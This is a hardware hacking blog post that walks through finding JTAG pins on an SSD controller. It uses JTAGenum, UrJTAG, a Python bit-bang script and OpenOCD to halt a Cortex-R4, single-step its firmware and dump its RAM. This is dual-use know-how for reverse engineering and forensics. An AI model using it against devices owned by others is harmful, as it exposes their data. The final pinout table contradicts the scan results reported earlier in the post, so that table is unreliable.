As mentioned before, JTAG lines are often grouped - so when looking at a new platform from a hardware perspective, looking for pin groupings of more than 5 is always a good start. Luckily for us, on this target there are 9 vias located along the outside of the PCB. Let's start by examining the voltage levels of these pins with the drive in a normal operating state:

Pin  Voltage Level  Usage
1    0.1 V          ???
2    1.8 V          ???
3    0.1 V          ???
4    0.1 V          ???
5    0.1 V          ???
6    0.1 V          ???
7    GND            GND
8    1.8 V          ???
9    1.8 V          ???

From a first pass these voltage values don't tell us much, so what can we determine based on the information we have? First off, we have a GND, which is easy to confirm by using continuity mode on the multimeter and testing against something like the shield of the USB connector (while the target is unplugged, of course!). Next, we have a line at 1.8 V; typically one would expect this to be TMS, as it is recommended to be held high in most documentation. To determine the pinout, we will use a Raspberry Pi and the JTAGEnum project. This script uses the aforementioned methods to attempt to identify a JTAG pinout. It is also important to note here that the logic levels are at 1.8 V, so we will need to use a logic level shifter if we're going to interface with this target. JTAGenum.sh uses the Raspberry Pi's GPIO lines to actuate the target interface; the shell script includes a map of the GPIO values, which can be seen below:

# define BCM pins (mapped directly to /sys/class/gpio/gpio${pin[N]})
# 5v 5v  g 14 15 18  g 23 24  g 25  8  7  1  g 12  g 16 20 21
# 3v  2  3  4  g 17 27 22 3v 10  9 11  g  0  5  6 13 19 26  g

Using our table above, we will wire the following GPIOs to the unknown header:

SSD Header Pin  RPi GPIO
1               2
2               3
3               9
4               10
5               11
6               25

In JTAGenum.sh we will modify the pins variable to be as follows:

pins=(9 11 25 2 3 10)
pinnames=(pin1 pin2 pin3 pin4 pin5 pin6)

Now, with the pins wired up and the logic level shifter in place, we can run JTAGenum.sh. Running the script wired up as shown below yields a TON of results; the output can be seen [here]. Luckily for us, it properly identifies two possible configurations, which can be seen below:

FOUND! ntrst:pin4 (RPi GPIO 2) tck:pin6 (RPi GPIO 10) tms:pin1 (RPi GPIO 9) tdo:pin3 (RPi GPIO 25) tdi:pin2 (RPi GPIO 11) IR length: 4
FOUND! ntrst:pin5 (RPi GPIO 3) tck:pin6 (RPi GPIO 10) tms:pin1 (RPi GPIO 9) tdo:pin3 (RPi GPIO 25) tdi:pin2 (RPi GPIO 11) IR length: 4

Next, the script ran an ID scan.
You might notice that a lot of results were generated for this - how do we filter through them? There are a few things that you can do. For example, we probably only have 1-2 devices on the scan chain (CPU and flash), so we can immediately ignore results that have more than 2-3 entries. Next, you can rule out those that have long (more than 4-5) sequences of 1's or 0's. Luckily, in this list there is an ID that I have seen before: 0x4ba00477 - this ID is for an ARM Cortex core, and I've seen it before when attempting to get access to the BeagleBone Black.

ntrst:pin4 tck:pin6 tms:pin1 tdo:pin3 tdi:pin2 devices: 1 0x4ba00477
ntrst:pin4 tck:pin6 tms:pin1 tdo:pin3 tdi:pin5 devices: 1 0x4ba00477
ntrst:pin5 tck:pin6 tms:pin1 tdo:pin3 tdi:pin2 devices: 1 0x4ba00477
ntrst:pin5 tck:pin6 tms:pin1 tdo:pin3 tdi:pin4 devices: 1 0x4ba00477

You'll notice that with the IDCODE scan the value for TDI varies; that is because this method does not rely on TDI at all, so it is a guess. Luckily, some of these results line up nicely with the pattern scan, so we can now assume that we know the pinout of the JTAG interface!

Pin  Voltage Level  Usage
1    0.1 V          ???
2    1.8 V          ???
3    0.1 V          TMS
4    0.1 V          TCK
5    0.1 V          TDI
6    0.1 V          TDO
7    GND            GND
8    1.8 V          ???
9    1.8 V          ???

Practical Example: Determining Instruction Length with UrJTAG

While OpenOCD is excellent for interfacing with DAP controllers and connecting to debugging cores, the UrJTAG project is great for interfacing with JTAG at a low level. We can use it to detect the various DR lengths with its useful discover command. This method uses the same principles mentioned earlier: select an IR, shift a large number of 1's into DR followed by a 0, then clock in more 1's until a 0 is read on TDO. UrJTAG can use an rc file located at ~/.jtag/rc; mine is as follows:

pi@raspberrypi:~ $ cat .jtag/rc
cable gpio tck=10 tms=9 tdi=11 tdo=25
detect
discover

Below we can see the result of running UrJTAG with these commands:

pi@raspberrypi:~ $ sudo -E jtag
UrJTAG 2019.12 #
Copyright (C) 2002, 2003 ETC s.r.o.
Copyright (C) 2007, 2008, 2009 Kolja Waschk and the respective authors

UrJTAG is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
There is no warranty for UrJTAG.

warning: UrJTAG may damage your hardware!
Type "quit" to exit, "help" for help.

Initializing GPIO JTAG Chain
IR length: 4
Chain length: 1
Device Id: 01001011101000000000010001110111 (0x4BA00477)
  Unknown manufacturer! (01000111011) (/usr/local/share/urjtag/MANUFACTURERS)
Detecting IR length ... 4
Detecting DR length for IR 1111 ... 1   <-- This is BYPASS!
Detecting DR length for IR 0000 ... 1
Detecting DR length for IR 0001 ... 1
Detecting DR length for IR 0010 ... 1
Detecting DR length for IR 0011 ... 1
Detecting DR length for IR 0100 ... 1
Detecting DR length for IR 0101 ... 1
Detecting DR length for IR 0110 ... 1
Detecting DR length for IR 0111 ... 1
Detecting DR length for IR 1000 ... 35
Detecting DR length for IR 1001 ... 1
Detecting DR length for IR 1010 ... 35
Detecting DR length for IR 1011 ... 35
Detecting DR length for IR 1100 ... 1
Detecting DR length for IR 1101 ... 1
Detecting DR length for IR 1110 ... 32  <-- This is IDCODE!

I wanted to highlight UrJTAG in this post because it is extremely useful when looking at a target with a completely unknown scan chain or DAP architecture.
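For reference, the core of what the discover command does can be sketched with the same assumptions as the earlier snippets (a Raspberry Pi with RPi.GPIO, hypothetical pin numbers, and the IR length of 4 reported above): load each candidate IR value, flood the DR with 1's, push a single 0 through, and count the clocks until it reappears on TDO.

import RPi.GPIO as GPIO

TCK, TMS, TDI, TDO = 10, 9, 11, 25   # hypothetical BCM pin assignments
IR_LEN = 4                            # IR length reported by the earlier scans

def clock(tms, tdi=1):
    GPIO.output(TMS, tms)
    GPIO.output(TDI, tdi)
    bit = GPIO.input(TDO)            # sample TDO before the rising edge
    GPIO.output(TCK, 1)
    GPIO.output(TCK, 0)
    return bit

def load_ir(value):
    for _ in range(5):               # Test-Logic-Reset
        clock(1)
    for t in (0, 1, 1, 0, 0):        # Idle, Select-DR, Select-IR, Capture-IR, Shift-IR
        clock(t)
    for i in range(IR_LEN):          # shift the instruction in LSB first, exit on the last bit
        clock(1 if i == IR_LEN - 1 else 0, (value >> i) & 1)
    clock(1)                         # Update-IR
    clock(0)                         # Run-Test/Idle

def dr_length(ir_value, flood=1024):
    load_ir(ir_value)
    for t in (1, 0, 0):              # Select-DR, Capture-DR, Shift-DR
        clock(t)
    for _ in range(flood):           # fill the selected DR with 1's
        clock(0, 1)
    clock(0, 0)                      # push a single 0 into the chain
    for count in range(1, flood):    # keep shifting 1's until the 0 comes out on TDO
        if clock(0, 1) == 0:
            return count
    return None                      # no 0 seen - probably not a valid DR path

GPIO.setmode(GPIO.BCM)
GPIO.setup([TCK, TMS, TDI], GPIO.OUT, initial=GPIO.LOW)
GPIO.setup(TDO, GPIO.IN)
for ir in range(2 ** IR_LEN):
    print("IR %s -> DR length %s" % (format(ir, "04b"), dr_length(ir)))
GPIO.cleanup()

On an ARM JTAG-DP like this one, the 35-bit data registers that show up behind IR values 1000, 1010 and 1011 are most likely the ABORT, DPACC and APACC scan chains, which is consistent with the UrJTAG output above.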
Luckily for us, the IDCODE of this target tells us that it is ARM, and we will likely be able to utilize the CoreSight DAP; to do this, we will use OpenOCD. If you are looking at a scan chain where you know nothing about it, I typically start with UrJTAG just to get a map of all of the registers. The Python bindings for UrJTAG also work quite well and can be used to interface with JTAG at a low level.

JTAG Debugging via OpenOCD

Since we know the pinout of the JTAG interface on our target, we can now move on to using OpenOCD to communicate with it. I am choosing OpenOCD for this task because it has excellent debugging support for ARM MCUs, particularly the Cortex series which uses CoreSight. The first thing we'll need to do is choose a hardware adapter; we will use the FT2232H breakout module.

JTAG via FT2232H

With the pinout understood, we can now attempt to talk to the DAP using OpenOCD. For this we will use an FT2232H adapter; for this post I am using a standard FT2232H breakout board. These boards can be used to interact with multiple hardware-level interfaces and have excellent software support. You may recall I've used them for things such as SWD as well as dumping SPI flash. Using this board, along with a 3.3V to 1.8V logic level converter, we can wire it up to the target as follows:

FT2232H Pin  Target
CN2-7        TCK
CN2-10       TDI
CN2-9        TDO
CN2-12       TMS

Next, we will write the outline of our config file, starting with the variables that we know about the target.

source [find target/swj-dp.tcl]

# This is using the name on the SoC
if { [info exists CHIPNAME] } {
   set _CHIPNAME $CHIPNAME
} else {
   set _CHIPNAME s4ln045x01
}

# This is the TAP ID that we discovered in the previous step
if { [info exists CPUTAPID] } {
   set _CPUTAPID $CPUTAPID
} else {
   set _CPUTAPID 0x4ba00477
}

# Set the speed of our adapter
adapter_khz 200

# We are indeed using JTAG
transport select jtag

# We don't have a SRST pin, only TRST it would seem
reset_config trst_only

# Here we create the JTAG TAP/DAP, defining the location and characteristics of our DAP
swj_newdap $_CHIPNAME cpu -irlen 4 -ircapture 0x1 -irmask 0xf -expected-id $_CPUTAPID
dap create $_CHIPNAME.dap -chain-position $_CHIPNAME.cpu
set _TARGETNAME $_CHIPNAME.cpu

When we run openocd with this config file, these are the results:

wrongbaud@wubuntu:~/blog/samsung-jtag$ sudo openocd -f minimodule.cfg -f config.cfg
Open On-Chip Debugger 0.10.0+dev-01040-ge7e681ac (2020-01-27-18:55)
Licensed under GNU GPL v2
For bug reports, read
        http://openocd.org/doc/doxygen/bugs.html
Info : auto-selecting first available session transport "jtag". To override use 'transport select <transport>'.
Warn : Transport "jtag" was already selected
Info : clock speed 200 kHz
Info : JTAG tap: s4ln045x01.cpu tap/device found: 0x4ba00477 (mfg: 0x23b (ARM Ltd.), part: 0xba00, ver: 0x4)
Info : Listening on port 6666 for tcl connections
Info : Listening on port 4444 for telnet connections
Info : JTAG tap: s4ln045x01.cpu tap/device found: 0x4ba00477 (mfg: 0x23b (ARM Ltd.), part: 0xba00, ver: 0x4)
Warn : gdb services need one or more targets defined

Now let's have a look at the DAP and see if there is any more relevant information in there:

> dap info 0
DAP transaction stalled (WAIT) - slowing down
DAP transaction stalled (WAIT) - slowing down
AP ID register 0x24770002
        Type is MEM-AP APB
MEM-AP BASE 0x80000000
        ROM table in legacy format
        Component base address 0x80000000
        Peripheral ID 0x0000080000
        Designer is 0x080, <invalid>
        Part is 0x0, Unrecognized
        Component class is 0x1, ROM table
        MEMTYPE system memory not present: dedicated debug bus
        ROMTABLE[0x0] = 0x1003
                Component base address 0x80001000
                Peripheral ID 0x04008bbc14
                Designer is 0x4bb, ARM Ltd.
                Part is 0xc14, Cortex-R4 Debug (Debug Unit)
                Component class is 0x9, CoreSight component
                Type is 0x15, Debug Logic, Processor
        ROMTABLE[0x4] = 0x2003
                Component base address 0x80002000
                Peripheral ID 0x04008bbc14
                Designer is 0x4bb, ARM Ltd.
                Part is 0xc14, Cortex-R4 Debug (Debug Unit)
                Component class is 0x9, CoreSight component
                Type is 0x15, Debug Logic, Processor
        ROMTABLE[0x8] = 0x3003
                Component base address 0x80003000
                Peripheral ID 0x04008bbc14
                Designer is 0x4bb, ARM Ltd.
                Part is 0xc14, Cortex-R4 Debug (Debug Unit)
                Component class is 0x9, CoreSight component
                Type is 0x15, Debug Logic, Processor
        ROMTABLE[0xc] = 0x4003
                Component base address 0x80004000
                Invalid CID 0x00000000
        ROMTABLE[0x10] = 0x5003
                Component base address 0x80005000
                Invalid CID 0x00000000
        ROMTABLE[0x14] = 0x6003
                Component base address 0x80006000
                Invalid CID 0x00000000
        ROMTABLE[0x18] = 0x7003
                Component base address 0x80007000
                Invalid CID 0x00000000
        ROMTABLE[0x1c] = 0x8003
                Component base address 0x80008000
                Invalid CID 0x00000000
        ROMTABLE[0x20] = 0x9003
                Component base address 0x80009000
                Invalid CID 0x00000000
        ROMTABLE[0x24] = 0xa003
                Component base address 0x8000a000
                Invalid CID 0x00000000
        ROMTABLE[0x28] = 0xb003
                Component base address 0x8000b000
                Invalid CID 0x00000000
        ROMTABLE[0x2c] = 0xc003
                Component base address 0x8000c000
                Invalid CID 0x00000000
        ROMTABLE[0x30] = 0xd003
                Component base address 0x8000d000
                Invalid CID 0x00000000
        ROMTABLE[0x34] = 0xe003
                Component base address 0x8000e000
                Invalid CID 0x00000000
        ROMTABLE[0x38] = 0xf003
                Component base address 0x8000f000
                Invalid CID 0x00000000
        ROMTABLE[0x3c] = 0x0
                End of ROM table

The first thing that sticks out is that this is a Cortex-R4; with this additional information we can create a target in the config file, which should grant access to the MEM-AP and allow for debugging.
This can be done by adding the following line:

target create $_TARGETNAME.1 cortex_r4 -endian $_ENDIAN -dap $_CHIPNAME.dap

With this additional line, we can try to halt the target via the halt command and read memory via mdw from the OpenOCD prompt:

> halt
MPIDR not in multiprocessor format
target halted in Thumb state due to debug-request, current mode: Supervisor
cpsr: 0x80000133 pc: 0x0001abfc
D-Cache: disabled, I-Cache: disabled
> mdw 0x800000000 10
DAP transaction stalled (WAIT) - slowing down
0x800000000: eafffffe ea000005 ea000006 ea000006 ea00000b e320f000 ea00000e eafffffe
0x800000020: ea0000e3 eafffffe

Here we test stepping through the running firmware:

> halt
MPIDR not in multiprocessor format
target halted in ARM state due to debug-request, current mode: Supervisor
cpsr: 0x80000113 pc: 0x0000e10c
D-Cache: disabled, I-Cache: disabled
> step
target halted in ARM state due to breakpoint, current mode: Supervisor
cpsr: 0x80000113 pc: 0x0000e110
D-Cache: disabled, I-Cache: disabled

Success! It appears to be working, and we can single-step through the firmware. Next, let's use this capability to get some RAM dumps; this page gives an overview of the memory model, so we can use that as a reference. Memory can be dumped to a file with OpenOCD via the dump_image command.

> halt
MPIDR not in multiprocessor format
target halted in ARM state due to debug-request, current mode: Abort
cpsr: 0x200001d7 pc: 0x00000048
D-Cache: disabled, I-Cache: disabled
Data fault registers
DFSR: 00000008, DFAR: 9f7e3000
Instruction fault registers
IFSR: 00000000, IFAR: 00000000
> dump_image SDRAM.bin 0x20000000 0xA0000000
> dump_image RAM.bin 0 0xFFFFFFF

Finally, let's take these RAM dumps and load them into GHIDRA to see if they make sense. Excellent - we have some xrefs and the init code looks fairly sane. It also looks like there is some sort of debug menu that is presented over the UART; these are likely pins 8/9 on our pinout! It's safe to say that this is a valid RAM dump, and with that I will finish up this post.

Conclusion

This was quite a long post - realistically it probably should have been broken up into 2-3 parts. With this post, we learned how JTAG functions at a low level, as well as how to approach JTAG as a reverse engineer. We were also able to get JTAG access to an undocumented target, extract memory, and single-step through the running firmware. There are lots of things left to do here, like determining whether the flash chips themselves can be dumped via JTAG, or reversing the firmware to look for interesting ways to recover data from the drive (I recently discovered that lots of cool work has been done here already!). As always, if you have any questions or comments, please feel free to reach out on Twitter.

Refs

I wanted to mention some awesome work that I found after going through all of this; both of these projects have already done a lot of what we did in this post, albeit on slightly different drives. I wanted to link to this excellent previous work, which was pointed out to me by members of the OpenOCD community!

https://github.com/thesourcerer8/SSDdiag
http://www2.futureware.at/~philipp/ssd/TheMissingManual.pdf

Sursa: https://wrongbaud.github.io/jtag-hdd/